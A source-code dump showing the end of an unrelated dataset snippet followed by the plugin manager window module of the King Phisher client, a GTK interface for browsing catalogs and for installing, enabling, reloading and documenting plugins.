"You want set num_samples to {}, but your dataset only has {} samples, so we will keep your dataset num_samples as {}"
.format(num_samples, len(self.file_list), len(self.file_list)))
num_samples = len(self.file_list)
self.num_samples = num_samples
|
plugin_manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/windows/plugin_manager.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import collections
import copy
import datetime
import errno
import functools
import os
import sys
import traceback
from king_phisher import utilities
from king_phisher.catalog import Catalog
from king_phisher.client import plugins
from king_phisher.client import gui_utilities
from king_phisher.client.widget import managers
from king_phisher.client.windows import html
from gi.repository import Gdk
from gi.repository import Gtk
import requests.exceptions
import smoke_zephyr.requirements
import smoke_zephyr.utilities
__all__ = ('PluginManagerWindow',)
_ROW_TYPE_PLUGIN = 'plugin'
_ROW_TYPE_REPOSITORY = 'repository'
_ROW_TYPE_CATALOG = 'catalog'
_LOCAL_REPOSITORY_ID = 'local'
_LOCAL_REPOSITORY_TITLE = '[Locally Installed]'
_ModelNamedRow = collections.namedtuple('ModelNamedRow', (
'id',
'installed',
'enabled',
'title',
'compatibility',
'version',
'visible_enabled',
'visible_installed',
'sensitive_installed',
'type'
))
class _ModelNode(object):
__slots__ = ('children', 'row')
def __init__(self, *args, **kwargs):
self.row = _ModelNamedRow(*args, **kwargs)
self.children = collections.deque()
class PluginDocumentationWindow(html.HTMLWindow):
"""
A window for displaying plugin documentation from their respective README.md
files. If the documentation file can not be found a
:py:exc:`.FileNotFoundError` exception will be raised on initialization. The
contents of the README.md file is then rendered as markdown data and
displayed using an :py:class:`~king_phisher.client.windows.html.HTMLWindow`.
The plugin must be loaded into the
:py:attr:`~king_phisher.client.application.KingPhisherClientApplication.plugin_manager`
but does not have to be enabled for documentation to be displayed.
"""
template = 'plugin-documentation.html'
"""The Jinja2 HTML template to load for hosting the rendered markdown documentation."""
def __init__(self, application, plugin_id):
"""
:param application: The parent application for this object.
:type application: :py:class:`Gtk.Application`
:param str plugin_id: The identifier of this plugin.
"""
super(PluginDocumentationWindow, self).__init__(application)
plugin_path = self.application.plugin_manager.get_plugin_path(plugin_id)
if plugin_path is None:
raise FileNotFoundError(errno.ENOENT, "could not find the data path for plugin '{0}'".format(plugin_id))
md_file = os.path.join(plugin_path, 'README.md')
if md_file is None or not os.path.isfile(md_file):
self.window.destroy()
raise FileNotFoundError(errno.ENOENT, "plugin '{0}' has no documentation".format(plugin_id), md_file)
self._md_file = md_file
self._plugin = self.application.plugin_manager[plugin_id]
self.refresh()
self.webview.connect('key-press-event', self.signal_key_press_event)
self.webview.connect('open-remote-uri', self.signal_webview_open_remote_uri)
self.window.set_title('Plugin Documentation')
def refresh(self):
"""
Refresh the contents of the documentation. This will reload both the
markdown content from README.md as well as the HTML template file.
"""
self.webview.load_markdown_file(self._md_file, template=self.template, template_vars={'plugin': self._plugin})
def signal_webview_open_remote_uri(self, webview, uri, decision):
utilities.open_uri(uri)
def signal_key_press_event(self, webview, event):
if event.type != Gdk.EventType.KEY_PRESS:
return
keyval = event.get_keyval()[1]
if keyval == Gdk.KEY_F5:
self.refresh()
class PluginManagerWindow(gui_utilities.GladeGObject):
"""
The window which allows the user to selectively enable and disable plugins
for the client application. This also handles configuration changes, so the
enabled plugins will persist across application runs.
"""
dependencies = gui_utilities.GladeDependencies(
children=(
'expander_info',
'grid_catalog_repo_info',
'grid_plugin_info',
'label_catalog_repo_info_description',
'label_catalog_repo_info_for_description',
'label_catalog_repo_info_for_maintainers',
'label_catalog_repo_info_homepage',
'label_catalog_repo_info_maintainers',
'label_catalog_repo_info_title',
'label_plugin_info_authors',
'label_plugin_info_compatible',
'label_plugin_info_description',
'label_plugin_info_for_classifiers',
'label_plugin_info_for_compatible',
'label_plugin_info_for_references',
'label_plugin_info_homepage',
'label_plugin_info_title',
'label_plugin_info_version',
'listbox_plugin_info_classifiers',
'listbox_plugin_info_references',
'menubutton_plugin_info',
'paned_plugins',
'scrolledwindow_plugins',
'stack_info',
'treeview_plugins',
'textview_plugin_info',
'viewport_info',
'statusbar'
)
)
top_gobject = 'window'
def __init__(self, *args, **kwargs):
super(PluginManagerWindow, self).__init__(*args, **kwargs)
self.catalog_plugins = plugins.ClientCatalogManager(self.application.user_data_path)
self.plugin_path = os.path.join(self.application.user_data_path, 'plugins')
self.status_bar = self.gobjects['statusbar']
self._installed_plugins_treeview_tracker = None
"""
This is used to track and make sure all plugins make it into the
treeview. It is set each time catalogs are loaded or refreshed. Once the
loading operation is complete, plugins that remain were not loaded due
their data (repo or id) missing from the catalog, likely due to it
having been removed.
"""
self._worker_thread = None
self._worker_thread_start(self._load_catalogs_tsafe)
self.__load_errors = {}
self.__installing_plugin = None
tvm = managers.TreeViewManager(self.gobjects['treeview_plugins'])
toggle_renderer_enable = Gtk.CellRendererToggle()
toggle_renderer_enable.connect('toggled', self.signal_renderer_toggled_enable)
toggle_renderer_install = Gtk.CellRendererToggle()
toggle_renderer_install.connect('toggled', self.signal_renderer_toggled_install)
tvm.set_column_titles(
('Installed', 'Enabled', 'Title', 'Compatible', 'Version'),
column_offset=1,
renderers=(
toggle_renderer_install,
toggle_renderer_enable,
Gtk.CellRendererText(),
Gtk.CellRendererText(),
Gtk.CellRendererText()
)
)
tvm.column_views['Enabled'].set_cell_data_func(toggle_renderer_enable, self._toggle_enabled_cell_data_func)
tvm.column_views['Enabled'].add_attribute(toggle_renderer_enable, 'sensitive', 1)
tvm.column_views['Enabled'].add_attribute(toggle_renderer_enable, 'visible', 6)
tvm.column_views['Installed'].set_cell_data_func(toggle_renderer_install, self._toggle_install_cell_data_func)
tvm.column_views['Installed'].add_attribute(toggle_renderer_install, 'visible', 7)
tvm.column_views['Installed'].add_attribute(toggle_renderer_install, 'sensitive', 8)
self._model = Gtk.TreeStore(str, bool, bool, str, str, str, bool, bool, bool, str)
self._model.set_sort_column_id(3, Gtk.SortType.ASCENDING)
self.gobjects['treeview_plugins'].set_model(self._model)
self._tv_popup_menu = managers.MenuManager(tvm.get_popup_menu())
self._tv_popup_menu.append_item(Gtk.SeparatorMenuItem())
self._tv_popup_menu.append('Reload', self.signal_popup_menu_activate_reload)
self._tv_popup_menu.append('Reload All', self.signal_popup_menu_activate_reload_all)
self._tv_popup_menu.append_item(Gtk.SeparatorMenuItem())
self._tv_popup_menu.append('Show Documentation', self.signal_popup_menu_activate_show_documentation)
self._tv_popup_menu.append('Update', self.signal_popup_menu_activate_update)
self._info_popup_menu = managers.MenuManager()
self._info_popup_menu.append('Reload', self.signal_popup_menu_activate_reload)
self._info_popup_menu.append_item(Gtk.SeparatorMenuItem())
self._info_popup_menu.append('Show Documentation', self.signal_popup_menu_activate_show_documentation)
self._info_popup_menu.append('Update', self.signal_popup_menu_activate_update)
self.gobjects['menubutton_plugin_info'].set_popup(self._info_popup_menu.menu)
self._update_status_bar('Loading...')
self.window.show()
paned = self.gobjects['paned_plugins']
self._paned_offset = paned.get_allocation().height - paned.get_position()
def __store_add_node(self, node, parent=None):
"""
Add a :py:class:`._ModelNode` to :py:attr:`._model`, recursively adding
child :py:class:`._ModelNode` or :py:class:`._ModelNamedRow` instances as
necessary. This is *not* tsafe.
:param node: The node to add to the TreeView model.
:type node: :py:class:`._ModelNode`
:param parent: An optional parent for the node, used for recursion.
"""
row = self._model.append(parent, node.row)
for child in node.children:
if isinstance(child, _ModelNode):
self.__store_add_node(child, parent=row)
elif isinstance(child, _ModelNamedRow):
self._model.append(row, child)
else:
raise TypeError('unsupported node child type')
def _add_catalog_to_tree_tsafe(self, catalog):
"""
Create a :py:class:`._ModelNode` instance to representing the catalog, its
data and add it to the TreeView model.
:param catalog: The catalog to add to the TreeView.
:type catalog: :py:class:`.Catalog`
"""
catalog_node = _ModelNode(
id=catalog.id,
installed=None,
enabled=True,
title=catalog.id,
compatibility=None,
version=None,
visible_enabled=False,
visible_installed=False,
sensitive_installed=False,
type=_ROW_TYPE_CATALOG
)
for repo in catalog.repositories.values():
repo_node = _ModelNode(
id=repo.id,
installed=None,
enabled=True,
title=repo.title,
compatibility=None,
version=None,
visible_enabled=False,
visible_installed=False,
sensitive_installed=False,
type=_ROW_TYPE_REPOSITORY
)
catalog_node.children.append(repo_node)
plugin_collection = self.catalog_plugins.get_collection(catalog.id, repo.id)
for plugin_info in plugin_collection.values():
installed = False
enabled = False
plugin_name = plugin_info['name']
install_src = self.config['plugins.installed'].get(plugin_name)
if install_src and repo.id == install_src['repo_id'] and catalog.id == install_src['catalog_id']:
installed = True
# plugin was added to treeview so it is removed from the temporary tracking dict
self._installed_plugins_treeview_tracker.pop(plugin_name)
enabled = plugin_name in self.config['plugins.enabled']
repo_node.children.append(_ModelNamedRow(
id=plugin_name,
installed=installed,
enabled=enabled,
title=plugin_info['title'],
compatibility='Yes' if self.catalog_plugins.is_compatible(catalog.id, repo.id, plugin_name) else 'No',
version=plugin_info['version'],
visible_enabled=True,
visible_installed=True,
sensitive_installed=True,
type=_ROW_TYPE_PLUGIN
))
gui_utilities.glib_idle_add_once(self.__store_add_node, catalog_node)
def _get_plugin_model_parents(self, plugin_model_row):
return _ModelNamedRow(*plugin_model_row.parent), _ModelNamedRow(*plugin_model_row.parent.parent)
def _on_plugin_load_error_tsafe(self, name, error):
# WARNING: this may not be called from the GUI thread
self.__load_errors[name] = (error, traceback.format_exception(*sys.exc_info(), limit=5))
def _plugin_disable(self, model_row):
named_row = _ModelNamedRow(*model_row)
self.application.plugin_manager.disable(named_row.id)
self.config['plugins.enabled'].remove(named_row.id)
self._set_model_item(model_row.path, enabled=False, sensitive_installed=True)
def _plugin_enable(self, model_row):
named_row = _ModelNamedRow(*model_row)
pm = self.application.plugin_manager
if not pm.loaded_plugins[named_row.id].is_compatible:
gui_utilities.show_dialog_error('Incompatible Plugin', self.window, 'This plugin is not compatible.')
return
if not pm.enable(named_row.id):
return
self._set_model_item(model_row.path, enabled=True, sensitive_installed=False)
self.config['plugins.enabled'].append(named_row.id)
def _plugin_install(self, model_row):
if not self._worker_thread_is_ready:
# check it here to fail fast, then self._worker_thread_start checks it again later
self._show_dialog_busy()
return
named_row = _ModelNamedRow(*model_row)
repo_model, catalog_model = self._get_plugin_model_parents(model_row)
if named_row.id in self.config['plugins.installed']:
plugin_src = self.config['plugins.installed'].get(named_row.id)
if plugin_src != {'catalog_id': catalog_model.id, 'repo_id': repo_model.id, 'plugin_id': named_row.id}:
window_question = 'A plugin with this name is already installed from another\nrepository. Do you want to replace it with this one?'
if not gui_utilities.show_dialog_yes_no('Plugin Already Installed', self.window, window_question):
return
if not self._remove_matching_plugin(named_row, plugin_src):
self.logger.warning("failed to uninstall plugin {0}".format(named_row.id))
return
self._worker_thread_start(self._plugin_install_tsafe, catalog_model, repo_model, model_row, named_row)
def _plugin_install_tsafe(self, catalog_model, repo_model, model_row, named_row):
self.__installing_plugin = named_row.id
self.logger.debug("installing plugin '{0}'".format(named_row.id))
self._update_status_bar_tsafe("Installing plugin {}...".format(named_row.title))
_show_dialog_error_tsafe = functools.partial(gui_utilities.glib_idle_add_once, gui_utilities.show_dialog_error, 'Failed To Install', self.window)
try:
self.catalog_plugins.install_plugin(catalog_model.id, repo_model.id, named_row.id, self.plugin_path)
except requests.exceptions.ConnectionError:
self.logger.warning("failed to download plugin {}".format(named_row.id))
_show_dialog_error_tsafe("Failed to download {} plugin, check your internet connection.".format(named_row.id))
self._update_status_bar_tsafe("Installing plugin {} failed.".format(named_row.title))
self.__installing_plugin = None
return
except Exception:
self.logger.warning("failed to install plugin {}".format(named_row.id), exc_info=True)
_show_dialog_error_tsafe("Failed to install {} plugin.".format(named_row.id))
self._update_status_bar_tsafe("Installing plugin {} failed.".format(named_row.title))
self.__installing_plugin = None
return
self.config['plugins.installed'][named_row.id] = {'catalog_id': catalog_model.id, 'repo_id': repo_model.id, 'plugin_id': named_row.id}
self.logger.info("installed plugin '{}' from catalog:{}, repository:{}".format(named_row.id, catalog_model.id, repo_model.id))
plugin = self._reload_plugin_tsafe(model_row, named_row)
if self.config['plugins.pip.install_dependencies']:
try:
packages = smoke_zephyr.requirements.check_requirements(tuple(plugin.req_packages.keys()))
except ValueError:
self.logger.warning("requirements check failed for plugin '{}', can not automatically install requirements".format(named_row.id))
packages = None
if packages:
self.logger.debug("installing missing or incompatible packages from PyPi for plugin '{0}'".format(named_row.id))
self._update_status_bar_tsafe(
"Installing {:,} dependenc{} for plugin {} from PyPi.".format(len(packages), 'y' if len(packages) == 1 else 'ies', named_row.title)
)
if self.application.plugin_manager.library_path:
pip_results = self.application.plugin_manager.install_packages(packages)
else:
self.logger.warning('no library path to install plugin dependencies')
_show_dialog_error_tsafe(
"Failed to run pip to install package(s) for plugin {}.".format(named_row.id)
)
# set pip results to none to safely complete and cleanly release installing lock.
pip_results = None
if pip_results is None:
self.logger.warning('pip install failed')
_show_dialog_error_tsafe(
"Failed to run pip to install package(s) for plugin {}.".format(named_row.id)
)
elif pip_results.status:
self.logger.warning('pip install failed, exit status: ' + str(pip_results.status))
_show_dialog_error_tsafe(
"Failed to install pip package(s) for plugin {}.".format(named_row.id)
)
else:
plugin = self._reload_plugin_tsafe(model_row, named_row)
self.__installing_plugin = None
gui_utilities.glib_idle_add_once(self.__plugin_install_post, catalog_model, repo_model, model_row, named_row)
def __plugin_install_post(self, catalog_model, repo_model, model_row, named_row):
# handles GUI related updates after data has been fetched from the internet
if model_row.path is not None:
version = self.catalog_plugins.get_collection(catalog_model.id, repo_model.id)[named_row.id]['version']
self._set_model_item(model_row.path, installed=True, version=version)
if self._selected_model_row.path == model_row.path:
self._popup_menu_refresh(model_row)
self._update_status_bar("Finished installing plugin {}.".format(named_row.title))
def _plugin_uninstall(self, model_row):
named_row = _ModelNamedRow(*model_row)
if not self.application.plugin_manager.uninstall(named_row.id):
return False
del self.config['plugins.installed'][named_row.id]
if model_row.parent and model_row.parent[_ModelNamedRow._fields.index('id')] == _LOCAL_REPOSITORY_ID:
del self._model[model_row.path]
else:
self._set_model_item(model_row.path, installed=False)
self.logger.info("successfully uninstalled plugin {0}".format(named_row.id))
self._update_status_bar("Finished uninstalling plugin {}.".format(named_row.title))
return True
def _popup_menu_refresh(self, model_row):
named_row = _ModelNamedRow(*model_row)
sensitive = named_row.type == _ROW_TYPE_PLUGIN and named_row.installed
self._info_popup_menu['Show Documentation'].set_property('sensitive', sensitive)
self._tv_popup_menu['Show Documentation'].set_property('sensitive', sensitive)
sensitive = named_row.type == _ROW_TYPE_PLUGIN and named_row.installed and named_row.sensitive_installed
self._info_popup_menu['Update'].set_property('sensitive', sensitive)
self._tv_popup_menu['Update'].set_property('sensitive', sensitive)
def _reload(self):
model_row = self._selected_model_row
named_row = _ModelNamedRow(*model_row)
if named_row.type == _ROW_TYPE_CATALOG:
self._worker_thread_start(self._reload_catalog_tsafe, model_row, named_row)
elif named_row.type == _ROW_TYPE_REPOSITORY:
# this just reloads the entire parent catalog, individual repositories
# can not be reloaded at this time
parent_model_row = model_row.parent
parent_named_row = _ModelNamedRow(*parent_model_row)
if parent_named_row.type != _ROW_TYPE_CATALOG:
self.logger.warning('repository treeview row\'s parent is not a catalog')
return
self._worker_thread_start(self._reload_catalog_tsafe, parent_model_row, parent_named_row)
elif named_row.type == _ROW_TYPE_PLUGIN:
if not named_row.installed:
return
self._worker_thread_start(self._reload_plugin_tsafe, model_row, named_row)
else:
self.logger.warning('reload selected for an unsupported row type')
def _reload_catalog_tsafe(self, model_row, named_row):
self._update_status_bar_tsafe('Reloading catalog...')
self._model.remove(model_row.iter)
if named_row.id == _LOCAL_REPOSITORY_ID:
self._load_catalog_local_tsafe()
else:
catalog_url = self.catalog_plugins.get_cache().get_catalog_by_id(named_row.id)['url']
if catalog_url:
self._load_catalog_from_url_tsafe(catalog_url)
self._update_status_bar_tsafe('Reloading catalog... completed.')
def _reload_plugin_tsafe(self, model_row, named_row, enabled=None):
self._update_status_bar_tsafe('Reloading plugin...')
pm = self.application.plugin_manager
if enabled is None:
enabled = named_row.id in pm.enabled_plugins
pm.unload(named_row.id)
try:
klass = pm.load(named_row.id, reload_module=True)
except Exception as error:
self._on_plugin_load_error_tsafe(named_row.id, error)
klass = None
else:
if enabled:
pm.enable(named_row.id)
self.__load_errors.pop(named_row.id, None)
gui_utilities.glib_idle_add_once(self.__reload_plugin_post, model_row, named_row, klass)
return klass
def __reload_plugin_post(self, model_row, named_row, klass=None):
if model_row.path is not None:
if named_row.id == self._selected_named_row.id:
self._set_info(model_row)
if klass is None:
self._set_model_item(model_row.path, title="{0} (Reload Failed)".format(named_row.id))
else:
self._set_model_item(
model_row.path,
title=klass.title,
compatibility='Yes' if klass.is_compatible else 'No',
version=klass.version
)
self._update_status_bar('Reloading plugin... completed.')
def _remove_matching_plugin(self, named_row, plugin_src):
repo_model = None
for catalog_model in self._model:
catalog_id = _ModelNamedRow(*catalog_model).id
if plugin_src and catalog_id == plugin_src['catalog_id']:
repo_model = next((rm for rm in catalog_model.iterchildren() if _ModelNamedRow(*rm).id == plugin_src['repo_id']), None)
break
elif plugin_src is None and catalog_id == _LOCAL_REPOSITORY_ID:
# local installation acts as a pseudo-repository
repo_model = catalog_model
break
if not repo_model:
return False
for plugin_model_row in repo_model.iterchildren():
named_model = _ModelNamedRow(*plugin_model_row)
if named_model.id != named_row.id:
continue
if named_model.enabled:
self._plugin_disable(plugin_model_row)
self._plugin_uninstall(plugin_model_row)
return True
return False
@property
def _selected_model_row(self):
treeview = self.gobjects['treeview_plugins']
selection = treeview.get_selection()
if not selection.count_selected_rows():
return None
(model, tree_paths) = selection.get_selected_rows()
return model[tree_paths[0]]
@property
def _selected_named_row(self):
model_row = self._selected_model_row
return _ModelNamedRow(*model_row) if model_row else None
def _set_model_item(self, model_path, **kwargs):
model_row = self._model[model_path]
for key, value in kwargs.items():
model_row[_ModelNamedRow._fields.index(key)] = value
def _set_info(self, model_instance):
named_model = _ModelNamedRow(*model_instance)
stack = self.gobjects['stack_info']
textview = self.gobjects['textview_plugin_info']
buf = textview.get_buffer()
buf.delete(buf.get_start_iter(), buf.get_end_iter())
model_id = named_model.id
if named_model.type == _ROW_TYPE_PLUGIN:
if model_id in self.__load_errors:
stack.set_visible_child(textview)
self._set_info_plugin_error(model_instance)
else:
stack.set_visible_child(self.gobjects['grid_plugin_info'])
self._set_info_plugin(model_instance)
else:
self._set_info_nonplugin(model_instance)
def _set_info_nonplugin(self, model_instance):
stack = self.gobjects['stack_info']
stack.set_visible_child(self.gobjects['grid_catalog_repo_info'])
named_model = _ModelNamedRow(*model_instance)
obj_catalog = None
# hide catalog repo labels
self.gobjects['label_catalog_repo_info_maintainers'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_for_maintainers'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_description'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_for_description'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_homepage'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_title'].set_text(named_model.title)
if not named_model.id:
return
if named_model.type == _ROW_TYPE_CATALOG:
obj = self.catalog_plugins.catalogs.get(named_model.id, None)
if not obj:
return
else:
obj_catalog = self.catalog_plugins.catalogs.get(_ModelNamedRow(*model_instance.parent).id, None)
if not obj_catalog:
return
obj = self.catalog_plugins.catalogs[_ModelNamedRow(*model_instance.parent).id].repositories[named_model.id]
maintainers = getattr(obj, 'maintainers', getattr(obj_catalog, 'maintainers', None))
if maintainers:
self.gobjects['label_catalog_repo_info_maintainers'].set_text('\n'.join(maintainers))
self.gobjects['label_catalog_repo_info_maintainers'].set_property('visible', True)
self.gobjects['label_catalog_repo_info_for_maintainers'].set_property('visible', True)
if getattr(obj, 'description', None):
self.gobjects['label_catalog_repo_info_description'].set_text(obj.description)
self.gobjects['label_catalog_repo_info_description'].set_property('visible', True)
self.gobjects['label_catalog_repo_info_for_description'].set_property('visible', True)
if getattr(obj, 'homepage', None) or getattr(obj, 'url', None):
url = getattr(obj, 'homepage', getattr(obj, 'url', None))
self.gobjects['label_catalog_repo_info_homepage'].set_markup("<a href=\"{0}\">Homepage</a>".format(url.replace('"', '"')))
self.gobjects['label_catalog_repo_info_homepage'].set_property('tooltip-text', url)
self.gobjects['label_catalog_repo_info_homepage'].set_property('visible', True)
def _set_info_plugin(self, plugin_model):
named_model = _ModelNamedRow(*plugin_model)
pm = self.application.plugin_manager
self._last_plugin_selected = plugin_model
if named_model.id in pm.loaded_plugins:
plugin = pm.loaded_plugins[named_model.id].metadata
is_compatible = plugin['is_compatible']
else:
repo_model, catalog_model = self._get_plugin_model_parents(plugin_model)
plugin = self.catalog_plugins.get_collection(catalog_model.id, repo_model.id)[named_model.id]
is_compatible = self.catalog_plugins.is_compatible(catalog_model.id, repo_model.id, named_model.id)
self.gobjects['label_plugin_info_title'].set_text(plugin['title'])
self.gobjects['label_plugin_info_compatible'].set_text('Yes' if is_compatible else 'No')
self.gobjects['label_plugin_info_version'].set_text(plugin['version'])
self.gobjects['label_plugin_info_authors'].set_text('\n'.join(plugin['authors']))
self.gobjects['label_plugin_info_description'].set_text(plugin['description'])
self._set_info_plugin_homepage_url(plugin['homepage'])
self._set_info_plugin_reference_urls(plugin.get('reference_urls', []))
classifiers = plugin.get('classifiers', [])
if classifiers:
self.gobjects['label_plugin_info_for_classifiers'].set_property('visible', True)
listbox = self.gobjects['listbox_plugin_info_classifiers']
listbox.set_property('visible', True)
gui_utilities.gtk_listbox_populate_labels(listbox, classifiers)
else:
self.gobjects['label_plugin_info_for_classifiers'].set_property('visible', False)
def _set_info_plugin_error(self, model_instance):
id_ = _ModelNamedRow(*model_instance).id
textview = self.gobjects['textview_plugin_info']
buf = textview.get_buffer()
exc, formatted_exc = self.__load_errors[id_]
buf.insert(buf.get_end_iter(), "{0!r}\n\n".format(exc), -1)
buf.insert(buf.get_end_iter(), ''.join(formatted_exc), -1)
def _set_info_plugin_homepage_url(self, url=None):
label_homepage = self.gobjects['label_plugin_info_homepage']
if url is None:
label_homepage.set_property('visible', False)
return
label_homepage.set_markup("<a href=\"{0}\">Homepage</a>".format(url.replace('"', '"')))
label_homepage.set_property('tooltip-text', url)
label_homepage.set_property('visible', True)
def _set_info_plugin_reference_urls(self, reference_urls):
label = self.gobjects['label_plugin_info_for_references']
listbox = self.gobjects['listbox_plugin_info_references']
gui_utilities.gtk_widget_destroy_children(listbox)
if not reference_urls:
label.set_property('visible', False)
listbox.set_property('visible', False)
return
label.set_property('visible', True)
listbox.set_property('visible', True)
gui_utilities.gtk_listbox_populate_urls(listbox, reference_urls, signals={'activate-link': self.signal_label_activate_link})
def _show_dialog_busy(self):
gui_utilities.show_dialog_warning('Currently Busy', self.window, 'An operation is already running.')
def _show_dialog_error_tsafe(self, title, message):
gui_utilities.glib_idle_add_once(gui_utilities.show_dialog_error, title, self.window, message)
def _toggle_enabled_cell_data_func(self, column, cell, model, tree_iter, _):
if model.get_value(tree_iter, 0) in self.__load_errors:
cell.set_property('inconsistent', True)
else:
cell.set_property('inconsistent', False)
def _toggle_install_cell_data_func(self, column, cell, model, tree_iter, _):
cell.set_property('inconsistent', model.get_value(tree_iter, 0) == self.__installing_plugin)
def _update_status_bar(self, string_to_set):
self.status_bar.pop(0)
self.status_bar.push(0, string_to_set)
def _update_status_bar_tsafe(self, string_to_set):
gui_utilities.glib_idle_add_once(self._update_status_bar, string_to_set)
def _worker_thread_start(self, target, *args, **kwargs):
"""
Start a worker thread. This must only be called from the main GUI thread
and *target* must be a tsafe method.
"""
if not self._worker_thread_is_ready:
self._show_dialog_busy()
self.logger.debug('plugin manager worker thread is alive, can not start a new one')
return False
self._worker_thread = utilities.Thread(target=target, args=args, kwargs=kwargs)
self._worker_thread.start()
return True
@property
def _worker_thread_is_ready(self):
return self._worker_thread is None or not self._worker_thread.is_alive()
#
# Catalog Loading Methods
#
# Each of these functions loads the catalog and handles add it to the
# TreeView as necessary.
#
def _load_catalogs_tsafe(self, refresh=False):
self._installed_plugins_treeview_tracker = copy.deepcopy(self.config['plugins.installed'])
for plugin in list(self._installed_plugins_treeview_tracker.keys()):
# Remove plugins already found to be locally installed.
if not self._installed_plugins_treeview_tracker[plugin]:
self._installed_plugins_treeview_tracker.pop(plugin)
if refresh:
gui_utilities.glib_idle_add_once(self._model.clear)
expiration = datetime.timedelta(seconds=smoke_zephyr.utilities.parse_timespan(self.config.get('cache.age', '4h')))
self._update_status_bar_tsafe('Loading, catalogs...')
self._load_catalog_local_tsafe()
catalog_cache = self.catalog_plugins.get_cache()
now = datetime.datetime.utcnow()
for catalog_url in self.config['catalogs']:
catalog_cache_dict = catalog_cache.get_catalog_by_url(catalog_url)
if not refresh and catalog_cache_dict and catalog_cache_dict['created'] + expiration > now:
catalog = self._load_catalog_from_cache_tsafe(catalog_cache_dict)
if catalog is not None:
continue
catalog_cache_dict = None
self.logger.debug("downloading catalog: {}".format(catalog_url))
self._update_status_bar_tsafe("Loading, downloading catalog: {}".format(catalog_url))
catalog = self._load_catalog_from_url_tsafe(catalog_url)
if catalog is None and catalog_cache_dict is not None:
self.logger.warning('failing over to loading the catalog from the cache')
self._load_catalog_from_cache_tsafe(catalog_cache_dict)
if self._installed_plugins_treeview_tracker:
self._load_missing_plugins_tsafe()
self._update_status_bar_tsafe('Loading completed')
self._installed_plugins_treeview_tracker = None
def _load_missing_plugins_tsafe(self):
local_model_row = None
for plugin in self._installed_plugins_treeview_tracker.keys():
self.logger.warning("plugin {} was not found in any loaded catalog or repo, moving to locally installed".format(plugin))
self.config['plugins.installed'][plugin] = None
self._installed_plugins_treeview_tracker[plugin] = None
for model_row in self._model:
if _ModelNamedRow(*model_row).id == _LOCAL_REPOSITORY_ID:
gui_utilities.glib_idle_add_wait(self._model.remove, model_row.iter)
break
else:
raise RuntimeError('failed to find the local plugin repository')
self._load_catalog_local_tsafe()
def _load_catalog_from_cache_tsafe(self, catalog_cache_dict):
catalog = None
try:
catalog = Catalog(catalog_cache_dict['value'])
except (KeyError, TypeError) as error:
self.logger.warning("{0} error when trying to add catalog dict to manager".format(error.__class__.__name))
else:
self.catalog_plugins.add_catalog(catalog, catalog_url=catalog_cache_dict['url'], cache=False)
self._add_catalog_to_tree_tsafe(catalog)
return catalog
def _load_catalog_from_url_tsafe(self, catalog_url):
catalog = None
try:
catalog = Catalog.from_url(catalog_url)
except requests.exceptions.ConnectionError:
self.logger.warning("connection error trying to download catalog url: {}".format(catalog_url))
self._show_dialog_error_tsafe('Catalog Loading Error', 'Failed to download catalog, check your internet connection.')
except Exception:
self.logger.warning('failed to add catalog by url: ' + catalog_url, exc_info=True)
self._show_dialog_error_tsafe('Catalog Loading Error', 'Failed to add catalog')
else:
self.catalog_plugins.add_catalog(catalog, catalog_url=catalog_url, cache=True)
self._add_catalog_to_tree_tsafe(catalog)
return catalog
def _load_catalog_local_tsafe(self):
"""
Load the plugins which are available into the treeview to make them
visible to the user.
"""
self.logger.debug('loading the local catalog')
pm = self.application.plugin_manager
self.__load_errors = {}
pm.load_all(on_error=self._on_plugin_load_error_tsafe)
node = _ModelNode(
id=_LOCAL_REPOSITORY_ID,
installed=None,
enabled=True,
title=_LOCAL_REPOSITORY_TITLE,
compatibility=None,
version=None,
visible_enabled=False,
visible_installed=False,
sensitive_installed=False,
type=_ROW_TYPE_CATALOG
)
for name, plugin in pm.loaded_plugins.items():
if self.config['plugins.installed'].get(name):
continue
self.config['plugins.installed'][name] = None
node.children.append(_ModelNamedRow(
id=plugin.name,
installed=True,
enabled=plugin.name in pm.enabled_plugins,
title=plugin.title,
compatibility='Yes' if plugin.is_compatible else 'No',
version=plugin.version,
visible_enabled=True,
visible_installed=True,
sensitive_installed=False,
type=_ROW_TYPE_PLUGIN
))
for name in self.__load_errors.keys():
node.children.append(_ModelNamedRow(
id=name,
installed=True,
enabled=False,
title="{0} (Load Failed)".format(name),
compatibility='No',
version='Unknown',
visible_enabled=True,
visible_installed=True,
sensitive_installed=False,
type=_ROW_TYPE_PLUGIN
))
gui_utilities.glib_idle_add_wait(self.__store_add_node, node)
#
# Signal Handlers
#
def signal_eventbox_button_press(self, widget, event):
if not (event.type == Gdk.EventType.BUTTON_PRESS and event.button == Gdk.BUTTON_PRIMARY):
return
if not self._last_plugin_selected:
return
named_plugin = _ModelNamedRow(*self._last_plugin_selected)
plugin_id = named_plugin.id
